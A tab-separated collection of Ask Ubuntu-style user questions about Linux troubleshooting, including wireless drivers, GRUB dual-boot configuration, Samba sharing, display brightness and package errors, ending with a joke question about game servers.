10.0.3.15 dns1 : 0.0.0.0 not sure if related , but the dns does n't seem right , as node does n't have an interface to reach 10.0.3.15 . if that 's the problem , what should i change to have the dns point to 192.168.0.11 ? thanks , roberto
352365	why root http requests in netstat - running ubuntu 12.04 livecd ?	when using ubuntu 12.04 livecd to browse the net with firefox , i captured the following output using netstat : active internet connections ( servers and established ) proto recv-q send-q local address foreign address state user inode pid/program name tcp 0 0 127.0.0.1 : domain 0.0.0.0 : * listen root 21355 - tcp 0 0 127.0.0.1 : ipp 0.0.0.0 : * listen root 12947 - tcp 0 0 10.0.1.103:40710 208.80.154.235 : http established ubuntu 49343 4190/firefox tcp 0 0 10.0.1.103:51222 50.56.4.164 : http time_wait root 0 - tcp 0 0 10.0.1.103:39295 24.200.237.109 : https established ubuntu 42454 4190/firefox tcp 0 0 10.0.1.103:35405 63.251.85.37 : http time_wait root 0 ... it seems that root is doing http request ? is it a standard implementation in ubuntu 12.04 lts and can someone explain a little bit more about it ?
352370	lightdm login problem	suddenly i am not able to login as usual , i just get kicked back to the login screen all the time . i have n't made any configuration changes , but there were some automatic updates installed before this happened . i can log in as another user without any problem . i can also log in as my normal user in a terminal . if i switch login manager from lightdm to gdm i can also log in . ubuntu version is 13.04 . any ideas how i can fix this issue ?
352372	ubuntu live usb on external 400gb solid state drive for prolonged use	in recent days i 've managed to destroy two internal hard drives ... both my own lenovo thinkpad t410 and within a fortnight my father 's lenovo ideapad y450 ... i think i spurned the harddisks by sitting them on the leather arm of the couch for prolonged periods ( i recently discovered breaking bad ) and they over heated and made mush of the internal hard drives . so i guess my question is ... i recently discovered the joys of ubuntu live usb where i could install packages onto my passport ( 400gb ) and persist the install across sessions . just wondering if there 's justification for ignoring the internal hard drive altogether and just using the install on my solid state drive ? i understand there may be hardware issues with this but if people are doing this what would be the best ssd to use for this ? thanks , mark .
352378	wireless network is not recognized	first of all , i am very new to linux ( as will be obvious ) . i just purchased a new tosiba satellite laptop with window 8 installed . i have downloaded ubuntu 12.04.2 to a cd and when i boot to the cd , i have the choice to run ubuntu or install it . i have tried to install it but it needs an internet connection . if i run it , it seems to work except that it does not detect the existence of a wireless network , which works just fine in windows 8 . i would like to install ubuntu and replace windows 8 entirely but i 'm afraid that i 'll still not be able to connect to the network and i will have lost windows 8 ( my only connection the the internet on this computer ) . i saw a suggestion to use the lspci command so i tried it . i do n't know how to copy the output to a file so i re-typed the result , as follows : lspci -nn | grep 0280 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) then , i saw the suggestion : please get a temporary ethernet connection and open a terminal ctrl+alt+t and do : sudo apt-get install firmware-b43-lpphy-installer sudo modprobe -r b43 & & sudo modprobe b43 detach the ethernet and your wireless should now be working . but this looks like it is specific to the network controller . i followed the advice i found in other answers to internet connection issues and downloaded the new realtec driver for linux ( linux_mac80211_0012.0207.2013.tar.bz2 ) but i do n't know what to do with it . if i somehow run this file , will i have access to the internet ? if i do , i think i can install ubuntu and replace windows 8 . my second question is : how do i get output from the terminal into a file so i can add it to a question ? thanks so much for your help . my second question is : how do i get output from the terminal into a file so i can add it to a question ? thanks so much for your help . i have executed the command : tar xvjf linux_mac80211_0012.0207.2013.tar.bz2 now i have several folders and lots of files . i have read the 'readme ' file but i still do n't know what to do . any help will be appreciated . yes , i have an ethernet connection through which i could connect to the internet , i think . should i try that and do a complete replace and install ?
352380	pdf viewer prints blank pages	i have a computer running ubuntu 13.04 with a konica minolta bizhub c20 printer that 's connected over ethernet . when i print a pdf using the built-in pdf viewer in ubuntu , the page will be blank , even though the pdf looks perfectly okay on the screen . however , if i open the very same file in firefox instead , i can print it just fine without any problems at all . what could be causing this problem ? the computer in question was previously running ubuntu 11.04 , and pdfs would always print correctly . i did a fresh install of ubuntu 13.04 .
352381	how can i install gphoto2 2.5.2 on raring ?	how can i install gphoto2 2.5.2 on my ubuntu 13.04 ? i 'm kind of a beginner on linux and having a bad time with it .
352383	can not install intermediate ssl certificate	so i 've got this lamp server running on ubuntu 12.04 with an ssl certificate installed . i 've got the certificate and the .ca-bundle files in /etc/ssl/certs . the host file located in /etc/apache2/sites-available called `` default-ssl '' has the following options in it ; sslcertificatefile /etc/ssl/certs/mydomain.crt sslcertificatekeyfile /etc/ssl/certs/mydomain.key sslcertificatechainfile /etc/ssl/certs/bundle.ca-bundle however my browser still doens't reckonize the intermediate certificate located in the bundle.ca-bundle file . please help me ! update : got it figured out ; had to edit the file 000-default located in /etc/apache2/sites-enabled/ and point it to the bundle.ca-bundle file .
352385	how can i access my backed up files from ubuntu one ?	how can i access my backed-up files from ubuntu one ? the are of the file type .gpg -- how can i open and access these files ?
352388	ntop - where do i need to look to find out how much data i have downloaded ?	ntop - where do i need to look to find out how much data i have downloaded ? or how can i track how much gb i have used ?
352389	is there a mac 68k emulator for ubuntu 12.04 ?	i have a oldie but goodie program for the 68k macintosh series that i would like to run on ubuntu 12.04 . how can that be done ? i have used basilisk on win xp but that pc now has , well of course , ubuntu 12.04 . cheers , masa
352397	ticking sound on speakers	there 's a really annoying ticking sound coming from my speakers that started yesterday . when you plug headphones in , it comes through the headphones too . any idea what it could be ?
352398	how do i enable the brightness keys on a lenovo y500 750m sli ?	has anyone managed to get your brightness keys working in ubuntu ? i 'm running 13.04 and the latest stable nvidia drivers . thus far i have tried this to no evail : i can not change the screen brightness . my y500 has a 750m if that helps . i 'm dual-booting windows 8 , but am trying to completely switch to ubuntu . i ca n't even adjust my brightness at all , which is draining my battery . anyone who has solved this , please post a detailed guide to help me and any other ubuntu noobs ! thanks , drew
352399	ubuntu 12.04lts screen brightness does n't change : always set to maximum	i have asus g55 es71 laptop and i recently installed ubuntu in it . whenever i start my laptop , the brightness level is set to maximum by default and it does n't change . manually changing it through settings does n't help . i have also tried the solutions posted on forum like this one : gksudo gedit /etc/rc.local and echo x > /sys/class/backlight/intel_backlight/brightness i tried substituting x with different values and rebooted but nothing happened . i manually tried to change the values in files actual_brightness and brightness from directory /sys/class/backlight/acpi_video0 but those files are read only and do n't allow me to change the values . i have actual_brightness=0 , brightness=0 and max_brightness=10 in those files currently . as a computer engineer , i am required to sit in front of it the whole time and it 's really taking a toll on my eyes !
352400	is it possible to install liveusb persistent on ntfs or ext4 ?	why liveusb can be installed as persistent only on fat/fat32 where max file size is limited to 4gb ? is it possible to choose another files system somehow , for example ntfs or ext4 for liveusb ubuntu persistent distro ? for me the problem is persistent file limit on fat32 - 4 gb . i got 16gb pendrive and i wan na use full rest size of it for persistent data . wikipedia / fat32
352402	ssh connections keep dropping	i have a server running ubuntu server 12.0.4 with openssh-server installed . i can connect to the server for about 30 minutes and then the connection drops . when i try to reconnect i get the remote system refused the connection.. i have used ps -a | grep ssh to verify that the the sshd is running , and i can ssh back to 127.0.0.1 and stay connected indefinitely . i have also tried adding clientaliveinterval 60 in /etc/ssh/sshd_config which made no difference .
352405	dual boot windows 8 and ubuntu 12.04 irst , ubuntu not booting ( black screen )	i 'm trying to dual boot windows 8 and ubuntu 12.04 on amy new asus zenbook u500vz with 2x 128 gb ssd in raid0 using intel rapid storage technology ( windows preloaded ) . after a bit of trial and error i finally got windows working and grub and ubuntu installed . but when i chose ubuntu to boot in grub i barely see the ubuntu logo with the dots then i get just a black screen ( tried adjusting the screen-brightness as suggested on similar threads ) and i hear the drum sounds but then nothing happens . this is what i did : i turned off secure boot , csm , fast boot and then installed windows in efi/gpt , turned off hibernate in windows and installed ubuntu . since it did n't show the `` alongside windows 8 '' option i tried install it manually in this order after the windows partition . 200mb for grub where i told ubuntu to place the bootloader about 8 gb for swap 15 gb for '/' the rest ~60 gb for '/home' i then ran boot repair and got grub to load and i have no issue with loading windows 8 . i do n't know what else to do . boot-repair gave me this for troubleshooting : link removed due to link-limtis see link in edit but with /6180438/ edit : tried reinstalling grub2 by following this : https : //help.ubuntu.com/community/grub2/installing # via_the_livecd_terminal but it did n't work : ubuntu @ ubuntu : ~ $ sudo grub-install -- boot-directory=/mnt/boot /dev/mapper/isw_dagfijbabd_raid0sys6 /usr/sbin/grub-setup : warn : attempting to install grub to a partitionless disk or to a partition . this is a bad idea.. /usr/sbin/grub-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-setup : error : will not proceed with blocklists . now grub wo n't work either . all i get is a grub repair prompt ... edit2 : i did a complete reinstall of both os from scratch . and got windows and grub working again . this time i also get the black screen when trying to load ubuntu from grub but now after a couple of minutes i get this message in a prompt : gave up waiting for root device . common problems : - boot args for ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/ [ a hard drive uuid ] does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) looks like it does n't load the right partition but why ? edit 3 : ran boot-repair again and the black screen is back without the output mentioned above in edit2 . could it be an issue with the nvidia geforce gt 650m ? it does n't show in the system details on the live usb . is there a way to install drivers from the live usb ? this is the new boot-repair link : http : //paste.ubuntu.com/6184097/ edit 4 : i tried to install the latest nvidia driver using sudo apt-get update sudo apt-get upgrade sudo apt-get install nvidia-current-updates without result ... . edit 5 : also tried setting the boot line to nomodeset , no splash , nvidia.modeset=0 and grub_gfxmode=1280x1024x32still a black screen with the drumsound . edit 6 : if it helps this is my /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod efi_gop insmod efi_uga insmod video_bochs insmod video_cirrus } insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.8.0-31-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 linux /boot/vmlinuz-3.8.0-31-generic.efi.signed root=uuid=fb4c455f-c123-4c54-abbd-d6217a6c2737 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-31-generic } menuentry 'ubuntu , with linux 3.8.0-31-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 echo 'loading linux 3.8.0-31-generic ... ' linux /boot/vmlinuz-3.8.0-31-generic.efi.signed root=uuid=fb4c455f-c123-4c54-abbd-d6217a6c2737 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-31-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.8.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 linux /boot/vmlinuz-3.8.0-29-generic root=uuid=fb4c455f-c123-4c54-abbd-d6217a6c2737 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.8.0-29-generic } menuentry 'ubuntu , with linux 3.8.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_gpt insmod ext2 set root= ' ( hd4 , gpt7 ) ' search -- no-floppy -- fs-uuid -- set=root fb4c455f-c123-4c54-abbd-d6217a6c2737 echo 'loading linux 3.8.0-29-generic ... ' linux /boot/vmlinuz-3.8.0-29-generic root=uuid=fb4c455f-c123-4c54-abbd-d6217a6c2737 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.8.0-29-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/25_custom # # # menuentry `` windows uefi bkpbootmgfw.efi '' { search -- fs-uuid -- no-floppy -- set=root b6f8-c530 chainloader ( $ { root } ) /efi/microsoft/boot/bkpbootmgfw.efi } menuentry `` windows boot uefi loader '' { search -- fs-uuid -- no-floppy -- set=root b6f8-c530 chainloader ( $ { root } ) /efi/boot/bkpbootx64.efi } # # # end /etc/grub.d/25_custom # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry 'system setup ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # and this is my /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' edit 7 i got ubuntu installed and working . by using the 12.04.03 alternate installer with this modification . [ http : // ] cirrus [ . ] ucsd [ . ] edu [ / ] ~pierce [ / ] fix_ubuntu_usb [ / ] . then i booted up and installed updates and nvidia drivers and i 'm back to blackscreen ! how do i get rid of the nvidia drivers ?
352407	ati driver overturned my desktop : /	i 'm turkish however my english not so good : d ok , i was installed ati radeon mobility xpress driver , after that i restarted . after enter password , screen get dark and i seed background image and desktop elements but i could n't see menu on left and top menu : / here so you understand you 're going good : ) do you can help me thanks lls|darkboy
352409	please help to fix error while mounting static	this is my original /etc/fstab this is uuid **this is my /mnt/ i 've edited /etc/fstab as below i believe , i 've edited /etc/fstab file as instructed here , but after restarting the system , i got this error . so i 've re-edited the /etc/fstab file back to the original , after restarting the system i still and always get the same error but i can login to and use the system as usual . please help me find out how to solve this problem .
352411	how can i run linux off of a usb and not on my computer at all ?	i have been looking around on the internet for this question but i am so confused as to how to do it . so many sites say different things . how do i run linux off the usb ? thank you for your help ,
352412	package system is broken ( primus )	stasik @ stasik-twh : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : primus-libs socat use 'apt-get autoremove ' to remove them . the following extra packages will be installed : primus-lib the following new packages will be installed : primus-lib 0 upgraded , 1 newly installed , 0 to remove and 5 not upgraded . 9 not fully installed or removed . need to get 0 b/89,8 kb of archives . after this operation , 362 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 202330 files and directories currently installed . ) unpacking primus-lib : amd64 ( from ... /primus-lib_201303160857git~raring1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/primus-lib_201303160857git~raring1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/primus/libgl.so.1 ' , which is also in package primus-libs : amd64 20130805-1~raringppa1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/primus-lib_201303160857git~raring1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) cant update . the problem started after the removal of primus . stasik @ stasik-twh : ~ $ sudo apt-get -f autoremove reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : primus-lib the following packages will be removed : primus-libs socat the following new packages will be installed : primus-lib 0 upgraded , 1 newly installed , 2 to remove and 5 not upgraded . 9 not fully installed or removed . need to get 0 b/89,8 kb of archives . after this operation , 843 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 202330 files and directories currently installed . ) unpacking primus-lib : amd64 ( from ... /primus-lib_201303160857git~raring1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/primus-lib_201303160857git~raring1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/primus/libgl.so.1 ' , which is also in package primus-libs : amd64 20130805-1~raringppa1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/primus-lib_201303160857git~raring1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) have tried sudo apt-get -f autoremove
352417	dell inspiron m5110 dimming troubleshoot	i 've had my inspiron laptop about 3 years now ( still runs windows 7 ) and have recently been encountering an issue in which the screen auto dims on it 's own repeatedly and randomly and can only be re-lit by hovering the cursor over the bottom task bar for a few seconds . sometimes this does n't help and i have to restart the system . it happens at full charge , plugged in , and during any tasks without discrimination . as you can imagine , this is extremely annoying and i would love if anyone could help fix this issue . i have even tried completely turning off dimming in my display settings , but it still occurs . please help !
352419	virtual shell environment	what virtualenv is to python , is _____ for linux ? is there a similar functionality to create a virtual environment that allows you to e.g . install and configure software and rollback or throw away later ? i know the possibilities of a virtual machine , i 'm interested in dropping the requirement of installing a complete operating system .
352420	grub2 update with wrong image	i 'm working on a multiboot system win7/ubuntu/arch . when i update my grub2 config on ubuntu with update-grub2 it detects the kernel/image from my arch system as most recent kernel/image for ubuntu : dpkg warning version 'linux ' has incorrect syntax version number does not start with a digit found linux image : /boot/vmlinuz-linux found initrd image : /boot/initramfs-linux.img so i need to find a way to exclude the arch kernel/image or else ...
352423	converting lots of images in pdf-format to jpg-format	more precisely : given a folder containing images in pdf-format ( each of which has a name of the form name.pdf , with name being composed of several words separated by spaces ) , how do i batch convert the images to jpg-format and preserve their names in the form name.jpg ? ( using pdftoppm as indicated in `` how to convert a .pdf file into a folder of images ? '' seems rather complicated , since it requires treating each image separately . )
352424	upgrading from *ubuntu beta	i 'd like to know if i decide to install an *ubuntu beta right now ( lubuntu ) , will i be able to upgrade to non-beta as soon as it comes out ( 17 august ) , or will i need to make a new installation ?
352427	juju-gui charm api did not respond	after deploying juju-gui , it is n't able to communicate with the charm api for some reason . when looking into the chrome debugger i get errors like xmlhttprequest can not load https : //manage.jujucharms.com/api/2/charms ? text=nod & autocomplete=true & limit=5 . origin https : //ec2-xx-xxx-xx.compute-1.amazonaws.com is not allowed by access-control-allow-origin . any ideas ?
352431	why ubuntu uses base 10 for calculating file sizes ?	i understand that hard drive companies do it to market a 900gb hd as an 1tb one , but what is the reason that nautilus uses base 10 as well ? should n't we try to be right rather than handy ?
352434	force high resolution for headless server , binary flgrx driver and nomachine	i 'm using the binary amd driver as opposed to the open source ones ( for performance reasons ) . i 'm using a monitor-less server with a remote desktop client ( nomachine ) . one of the issues i am having is that with the binary amd driver i can no longer 'force ' my desktop resolution to 1920x1080 , it maxes out at 1600x1200 and it 's unable to be changed : gary @ exar-kun : /etc/x11 $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) crt1 connected primary 1600x1200+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1600x1200 60.0*+ 1400x1050 60.0 1600x900 60.0 1360x1024 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1366x768 59.8 1360x768 60.0 1280x800 59.8 1152x864 60.0 1280x768 59.9 1280x720 60.0 1024x768 60.0 ..snip.. crt2 disconnected ( normal left inverted right x axis y axis ) 1920x1080_60.00 ( 0xbd ) 173.0mhz h : width 1920 start 2048 end 2248 total 2576 skew 0 clock 67.2khz v : height 1080 start 1083 end 1088 total 1120 clock 60.0hz i ca n't use xrandr to set the physical resolution without a monitor attached and the catalyst control panel shows 2 resolutions that have super high settings ( 4000x4000 and 2500x1600 ( or so ) ) is it possible to use the crt2 in headless mode instead of 'stretching ' the framebuffer ? i can do this without using any crazy xorg things , ie : xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr -- addmode vga-0 `` 1920x1080_60.00 '' xrandr -- output vga-0 -- mode 1920x1080_60.00
352436	can not undo sudo chmod 655 /	i 've accidentally run 'sudo chmod 655 / ' , and now i can not undo this operation again because i can not access sudo anymore . i 'd actually wanted the permission to be set to 755 . is there any way i can fix it ?
352437	ubuntu installer does n't detect my other os	i have my bootable ubuntu usb stick and the installer guides me through the steps . i get to the step where i 'd like to say ''install alongside windows 7 '' but the installer tells me that no operating system is detected on my computer . windows is installed on an ssd while my fat files are on a hdd
352441	menus do n't show after an upgrade	i 'm having this problem after an automatic upgrade , where the only thing that is correctly loaded is the background image . another user experienced the exact same problem , though the cause is different ( this was his post : desktop does not show when i installed nvidia drivers ! ) . consider that previously to this , i used repair mode , but it did n't work at all ! once i load ubuntu in normal mode , the same thing happens . thanks in advance .
352443	not able to remove davmail	now i am using 13.04 ubuntu.i tried to install davmail i got error message for library missing . after long tries i decided to remove the davmail . $ sudo apt-get remove davmail reading package lists ... done building dependency tree reading state information ... done e : the package davmail needs to be reinstalled , but i ca n't find an archive for it . same for any application . i cant install or remove the apps please help me
352445	broadcomm wireless driver install problem	i have tried to install the broadcom drivers according to this thread ( how to install broadcom wireless drivers ) when i try |i get this ... . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? so i followed this thread to remove the lock ( http : //ubuntuforums.org/showthread.php ? t=1015279 ) when i use the command ... sudo sudo dpkg -- configure -a ... my termanal freezes ... here is the terminal output up to were it freezes ... ryan @ ryan-gc670aar-aba-a6120n : ~ $ sudo dpkg -- configure -asetting up bcmwl-kernel-source ( 6.20.155.1+bdcom-0ubuntu0.0.2 ) ... removing old bcmwl-6.20.155.1+bdcom dkms files ... -- -- -- -- uninstall beginning -- -- -- -- module : bcmwl version : 6.20.155.1+bdcom kernel : 3.8.0-31-generic ( i686 ) status : before uninstall , this module version was active on this kernel . wl.ko : - uninstallation - deleting from : /lib/modules/3.8.0-31-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... . dkms : uninstall completed . deleting module version : 6.20.155.1+bdcom completely from the dkms tree . done . loading new bcmwl-6.20.155.1+bdcom dkms files ... building only for 3.8.0-31-generic building for architecture i686 building initial module for 3.8.0-31-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.8.0-31-generic/updates/dkms/ depmod ... . dkms : install completed . please hepl me , i am not a complete noob but also not really great at ubuntu thanks
352448	disk image mounter	i am on ubuntu 12.04 and i do n't find disk image mounter as an option when i right click on a iso file . can any help me with this ? thanks !
352456	samba setup for windows domain access	background : i am setting up a linux box for a local accounting office . the purpose of the box is to alleviate the threat of viruses that have access to the network via usb drives . please keep in mind that this office needs the highest security possible . my configuration is attempting to leverage samba to allow members of the already configured ( and highly secure ) windows 2008 server to access the samba share . i have added the user name of each of the people who need to access the linux box to the system but have not added passwords as the passwords on the windows server are required to change quite often . attempting to manage a password database on the linux box is to be avoided if at all possible . requirements : no password authentication required for logged-in windows users to access samba share . as little manipulation of current windows security policies as possible . all users who access the share should have full read and write permissions ( execute is not necessary ) . problem : currently , all attempts to connect to the samba server by unauthenticated users is met with an error on the windows side saying `` access to the resource { insert ip address } has been disallowed . '' samba is running with the following smb.conf file that i built from scratch : [ global ] workgroup = { windows domain name } server string = removable media server security = share [ media ] path = /media writable = yes browsable = yes guest ok = yes guest only = yes force directory mode = 0666 force create mode = 0666 samba version is 3.6.9 . samba 's testparm command returns no errors . i have always restarted the samba server after making changes to the samba configuration . what i have tried : in smb.conf : setting security to user . and just about every setting i have run across . other things of note : the samba share is seen by the windows domain and is actually accessible from a windows administrator session . one more thing : i am very new to samba so please bear with me .
352457	fix sound controls after using medibuntu source	i 'm running ubuntu 12.04 on a laptop . i wanted to install a certain pkg that was in medibuntu so i added it to my sources list and installed it through apt-get . i accepted whatever it was going to install and afterwards my normal sound controls at the upper right next to the time no longer work . i was n't too worried about it since the sound otherwise worked fine but i miss the controls . i 've removed medibuntu from sources and updated everything but nothing changed . how can i get them to work again ? thanks
352459	i 've changed grub_default value from 0 to 1 and it made ubuntu boot to the recovery mode	since then i ubuntu ca n't start . even after i go to `` resume '' in the recovery mode , it keeps leaving me a black screen . another thing , when booting , ubuntu shows something like `` error ntfs preset ''
352460	persistence file casper-rw placed on hard drive	i was hoping to place my persistence file , casper-rw on the harddrive or my computer . my reason for such is that my home pc is shared with my wife who uses xp and would complain about any multi-boot setup . performance also should improve . the computer has ext3 partitions and also ntfs partitions . i have used linux distributions where a search is made of all drives looking for it 's persistence file . persistence works fine with casper-rw placed on the usb stick . i thought that there may be a kernel boot parameter to accomplish this . i see : persistent-path=path todisk=device but the 'casper ' manual does not offer a choice of my desire . i was hoping for something akin to : .. persistent persistent-file= ( hd0,4 ) /casper-rw ... i am using syslinux.cfg 13.04 am i on the right path or is this something that can not be done ? as a 2nd option could a separate partition be used for such ?
352461	setting up postfix with amavisd-new , spamassassin , clamav , and spf checking ?	i am working on learning how to setup a mail server and have a question regarding the use of mail filters with postfix . i am looking at the following guide ( as well as a similar guide on the ubuntu wiki ) : https : //help.ubuntu.com/12.04/serverguide/mail-filtering.html it has you install a number of packages : amavisd-new , spamassassin , clamav-daemon , opendkim , postfix-policyd-spf-python , pyzor , razor then , very simple directions are given ( which is nice ) for setting up clamav , spamassassin , and amavisd-new . it is mentioned specifically that spamassassin will automatically detect and use pyzor and razor , and that no additional setup is needed for those . however , there is never any discussion as to how to setup spf or dkim , or whether they are automatically setup . are these also automatically setup and integrated , like pyzor and razor ? or , is additional setup needed ? the ubuntu manpage discusses a setup for postfix-policyd-spf-python , as does an ubuntu wiki page , but neither discusses anything about amavisd-new , spamassassin , or clamav-daemon , and whether or not spf is automatically setup with those and the postfix-policyd-spf-python package , or whether the setup they detail must be done whether you are using it with those three package or not . http : //manpages.ubuntu.com/manpages/precise/man1/policyd-spf.1.html can anyone clarify this a bit ? thank you .
352463	what is the license conditions to use sublime text ? can i use it for free in ubuntu ?	what 's the deal with sublime text ( v2 in particular ) ? i want to use it simply for practice ( currently html5/css ) . is it legal to use for free if i 'm not using it for financial gain ?
352466	we are running ubuntu on our gta 5 servers	but we can not seem to get the max connections to exceed 12 people help us please . we have already tried throwing some of our billions of dollars we made from selling the game at the servers but this does not seem to appease the servers they started shooting laser beams at us and we got scared and just left our servers alone . we need help .
